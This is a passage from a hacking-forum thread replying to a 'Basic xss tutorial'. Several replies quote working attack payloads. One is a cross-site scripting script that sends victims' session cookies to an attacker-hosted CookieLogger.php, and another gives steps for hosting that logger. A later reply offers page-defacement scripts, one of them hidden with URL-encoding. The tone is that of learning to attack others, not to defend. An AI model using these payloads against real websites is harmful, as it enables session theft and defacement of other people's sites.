Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Basic xss tutorial filter_list
Author
Message
RE: Basic xss tutorial #21
(09-13-2012, 04:41 PM)chipp Wrote:
(09-11-2012, 02:01 PM)Anima Templi Wrote: I do not use one of them either, why not create a skype account?

i never use VoIP, and no need of using it at the moment...

I respect that. Hit me with a PM if you have questions then.

Reply

RE: Basic xss tutorial #22
very detail and helpful. thanks!

Reply

RE: Basic xss tutorial #23
Your welcome! I am glad that you found this useful.

Reply

RE: Basic xss tutorial #24
(09-13-2012, 04:41 PM)chipp Wrote:
(09-11-2012, 02:01 PM)Anima Templi Wrote: I do not use one of them either, why not create a skype account?

i never use VoIP, and no need of using it at the moment...

Skype isn't just for voice chat, I hardly use it for voice chat anyway.
You can live chat on skype.



Reply

RE: Basic xss tutorial #25
hello Anima Templi i have try to get you on skype but your offline please can you please contact me when you are online on skype
thanks

Reply

RE: Basic xss tutorial #26
(11-25-2012, 10:06 AM)babinjames87 Wrote: hello Anima Templi i have try to get you on skype but your offline please can you please contact me when you are online on skype
thanks

I am really bussy atm. I have two really large projects, but i will try to be as active and online as possible.

(11-25-2012, 11:34 AM)h4ck Wrote: thx4 dis tut...................................................

Your welcome sir, i hope this has explained and tought you the basics of xss.

Reply

RE: Basic xss tutorial #27
I didnt understand this part: This is the script you shall add to your xss vulnerability:

Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

can u explain me pls by PM thanks
BECOME A HACKING GOD BUT DONT THINK U ARE A GOD OTHERS ARE ALSO GOOD AS U ARE LEARN AND LEARN TILL U UNDERSTAND WHAT IT IS .. :Cool:

Reply

RE: Basic xss tutorial #28
First of setup an account on a free hosting service. Personally i find http://www.000webhost.com as the best. Once you done that create a file on the root folder and call it CookieLogger.txt leave the text file empty. It is in that file the cookie logger will save the cookies it logs. Now create another file called CookieLogger.php remember the extension .php . In that file insert this code:
first i setup an account ok Smile
what is root folder?
do u mean to go to the control panel and press file manger and upload the two files?
sorry cause iam abegginer Sad help

Reply

RE: Basic xss tutorial #29
Root folder is where you keep your files like index.html etc , the root normally is the main folder where you upload files for your websites and for 000webhost it will be folder called public_html so you just upload the website/script on there and that's it.

Nice tutorial I just start learning about xss and this is very helpful for me, easy and simple ! Thanks

Reply

RE: Basic xss tutorial #30
Thanks for a great tutorial @Anima Templi Smile Really well explained. I just wanted to mention a method to deface which doesn't require you to relocate the user.

Instead of this
Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>

... you can do this ...

Code:
<script>document.documentElement.innerHTML = unescape('%74%68%69%73%20%70%61%67%65%20%68%61%73%20%62%65%65%6e%20%64%65%66%61%63%65%64');</script>

You don't have to use unescape() but it's a good way to inject a styled deface page Smile
"SQL Injection-a-holic"

Twitter | Security Sucks | My Blog

Reply